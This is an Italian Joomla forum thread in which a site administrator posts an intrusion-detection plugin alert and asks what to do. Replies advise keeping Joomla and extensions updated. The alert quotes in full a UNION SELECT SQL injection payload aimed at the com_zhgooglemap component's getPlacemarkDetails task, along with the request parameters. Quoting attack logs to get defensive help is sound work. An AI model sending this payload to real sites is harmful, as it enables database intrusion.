Autore Topic: continui attacchi rilevati da plugin Marco's Interceptor  (Letto 880 volte)

Offline Funghetto

  • Nuovo arrivato
  • *
  • Post: 12
    • Mostra profilo
Ciao, sto avendo continui tentativi di attacchi su vari siti che gestisco, anche su quelli dove costantemente aggiorno versione di joomla e componenti vari.

Questi attacchi mi vengono rilevati dal plugin Marco's Interceptor che in automatico mi avvisa con messaggi di questo tipo, cosa posso fare?

Citazione
** PATTERNS MATCHED (possible hack attempts) * Union Select $_POST['id'] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,11,-- * Union Select $_REQUEST['id'] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,-- ** PAGE / SERVER INFO *REMOTE_ADDR : 14.xxx.xxx.xxx *HTTP_USER_AGENT : Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) *REQUEST_METHOD : POST *QUERY_STRING : ** SUPERGLOBALS DUMP (sanitized) *$_GET DUMP: Array ( ) *$_POST DUMP: Array ( [option] => com_zhgooglemap [no_html] => 1 [format] => raw [task] => getPlacemarkDetails [id] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,11,-- ) *$_COOKIE DUMP: Array ( ) *$_REQUEST DUMP: Array ( [option] => com_zhgooglemap [no_html] => 1 [format] => raw [task] => getPlacemarkDetails [id] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,11,-- )
« Ultima modifica: 21 Mar 2019, 15:07:54 da jeckodevelopment »

Offline danielecr

  • Abituale
  • ****
  • Post: 1342
    • Mostra profilo
Re:continui attacchi rilevati da plugin Marco's Interceptor
« Risposta #1 il: 09 Mar 2019, 10:50:31 »
Nulla, a meno che tu non voglia andare a casa di chi/cosa compie l'attacco e staccargli la corrente e la fibra.

Offline jeckodevelopment

  • Administrator
  • Instancabile
  • *****
  • Post: 5666
  • Sesso: Maschio
    • Mostra profilo
Re:continui attacchi rilevati da plugin Marco's Interceptor
« Risposta #2 il: 21 Mar 2019, 15:08:32 »
assicurarti di avere SEMPRE l'ultima versione di Joomla e delle estensioni (componenti, moduli, plugin e template)

 

Host

Torna su